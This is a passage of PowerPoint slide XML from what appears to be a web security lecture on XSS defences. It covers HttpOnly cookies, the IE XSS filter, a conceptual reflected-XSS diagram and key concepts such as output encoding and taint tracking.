            <a:ext cx="8056373" cy="2741263"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12700" algn="ctr">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd type="none" w="lg" len="med"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
              </a:rPr>
              <a:t>  Cookie sent over HTTP(s),  but not accessible to scripts</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="40000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
              </a:rPr>
              <a:t>  cannot be read via  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
              </a:rPr>
              <a:t>document.cookie</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="7030A0"/>
              </a:solidFill>
              <a:latin typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:spcBef>
                <a:spcPct val="40000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
              </a:rPr>
              <a:t> Also blocks access from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
              </a:rPr>
              <a:t>XMLHttpRequest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
              </a:rPr>
              <a:t> headers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="40000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
              </a:rPr>
              <a:t>  Helps prevent cookie theft via XSS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="2800"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
              </a:rPr>
              <a:t> …  but does not stop most other risks of XSS bugs.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="57358" name="TextBox 13"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7443788" y="914400"/>
            <a:ext cx="1331390" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(not Safari?)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55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IE XSS Filter</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="58371" name="Content Placeholder 2" descr="Rectangle: Click to edit Master text styles&#10;Second level&#10;Third level&#10;Fourth level&#10;Fifth level"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="1562100"/>
            <a:ext cx="7772400" cy="4648200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>What can you do at the client?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="58372" name="Picture 18" descr="toshiba_satellite_a105_s4284_laptop"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="990600" y="3135314"/>
            <a:ext cx="1436688" cy="1436687"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="58373" name="Picture 11" descr="CompaqAlphaServerES40"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5883275" y="4903789"/>
            <a:ext cx="1155700" cy="1420812"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="58374" name="Picture 4" descr="DS15serverfront"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5945188" y="2438400"/>
            <a:ext cx="2436812" cy="846139"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="58375" name="Text Box 6"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6324601" y="2667000"/>
            <a:ext cx="1426160" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="660066"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Attack Server</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="58376" name="Text Box 6"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5486400" y="4427537"/>
            <a:ext cx="1487780" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="660066"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Server Victim </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="58377" name="Straight Arrow Connector 17"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="2427288" y="2454275"/>
            <a:ext cx="3211512" cy="687388"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="28575" algn="ctr">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:prstDash val="dash"/>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="arrow" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="58378" name="Text Box 6"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="609602" y="4419600"/>
            <a:ext cx="1266693" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="660066"/>
                </a:solidFill>
              </a:rPr>
              <a:t>User Victim</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="58379" name="Straight Arrow Connector 20"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="10800000" flipV="1">
            <a:off x="2427288" y="2836863"/>
            <a:ext cx="3440112" cy="773112"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="28575" algn="ctr">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:prstDash val="dash"/>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="arrow" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="58380" name="Straight Arrow Connector 25"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2655888" y="4495800"/>
            <a:ext cx="2830512" cy="990600"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="28575" algn="ctr">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="arrow" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="58381" name="TextBox 26"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="1122022">
            <a:off x="3430590" y="4619108"/>
            <a:ext cx="1654175" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>click on link</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="58382" name="TextBox 29"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="1122022">
            <a:off x="2700340" y="5069959"/>
            <a:ext cx="2638425" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>echo user input</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="58383" name="Oval 32"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="1068865">
            <a:off x="3095627" y="4238626"/>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3</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="58384" name="Straight Arrow Connector 34"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2133600" y="4857749"/>
            <a:ext cx="3352800" cy="1162051"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="28575" algn="ctr">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd type="arrow" w="med" len="med"/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="58385" name="Straight Arrow Connector 36"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="2579688" y="3427413"/>
            <a:ext cx="3211512" cy="687387"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="28575" algn="ctr">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="arrow" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="58386" name="TextBox 37"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="-709076">
            <a:off x="3409295" y="3298308"/>
            <a:ext cx="1941237" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>send valuable data</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="58387" name="Oval 38"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2895602" y="35814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5</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="58388" name="Oval 39"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="1068865">
            <a:off x="2409827" y="4540251"/>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4</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="58389" name="TextBox 24"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="165100" y="6443664"/>
            <a:ext cx="8826500" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="660066"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://blogs.msdn.com/ie/archive/2008/07/01/ie8-security-part-iv-the-xss-filter.aspx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normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="3200" smtClean="0"/>
              <a:t>Complex problems in social network sites</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1028" name="laptop"/>
          <p:cNvSpPr>
            <a:spLocks noEditPoints="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="152400" y="1828800"/>
            <a:ext cx="5105400" cy="41148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smtClean="0">
              <a:solidFill>
                <a:srgbClr val="40458C"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1029" name="Picture 4" descr="C:\Documents and Settings\John Mitchell\Local Settings\Temporary Internet Files\Content.IE5\ZR24IX3M\MCj04348450000[1].png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5257800" y="2133601"/>
            <a:ext cx="1714500" cy="1714500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Can 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7554915" y="1828800"/>
            <a:ext cx="1284287" cy="1676400"/>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40458C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>User data</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1031" name="Picture 9" descr="C:\Documents and Settings\John Mitchell\Local Settings\Temporary Internet Files\Content.IE5\DCKGN2VX\MCj04352420000[1].png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6132513" y="4572000"/>
            <a:ext cx="1270000" cy="2514600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1032" name="TextBox 15"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7391400" y="5080000"/>
            <a:ext cx="1436688" cy="923330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>User-supplied application</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Down Arrow 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="6819900" y="2552700"/>
            <a:ext cx="3048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9" name="Down Arrow 18"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="8578543">
            <a:off x="6375400" y="3756025"/>
            <a:ext cx="304800" cy="69373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 name="Down Arrow 19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="4686300" y="2933700"/>
            <a:ext cx="3048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aphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="1026" name="Object 2"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noChangeAspect="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1143000" y="2133600"/>
          <a:ext cx="3144838" cy="2143125"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
            <p:oleObj spid="_x0000_s5130" name="Acrobat Document" r:id="rId6" imgW="2664000" imgH="2131200" progId="Acrobat.Document.11">
              <p:embed/>
            </p:oleObj>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="Down Arrow 22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="4686300" y="3009900"/>
            <a:ext cx="3048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Rectangle 16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1200152" y="2933700"/>
            <a:ext cx="1685925" cy="7048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4" name="Rectangle 23"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1143000" y="2133600"/>
            <a:ext cx="3143250" cy="215265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xmlns="" val="551237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Points to remember</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="50179" name="Content Placeholder 2" descr="Rectangle: Click to edit Master text styles&#10;Second level&#10;Third level&#10;Fourth level&#10;Fifth level"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>Key concepts</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>Whitelisting vs. blacklisting</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>Output encoding vs. input sanitization</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>Sanitizing before or after storing in database </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>Dynamic versus static defense techniques</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>Good ideas</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>Static analysis (e.g. ASP.NET has support for this) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>Taint tracking </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>Framework support </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
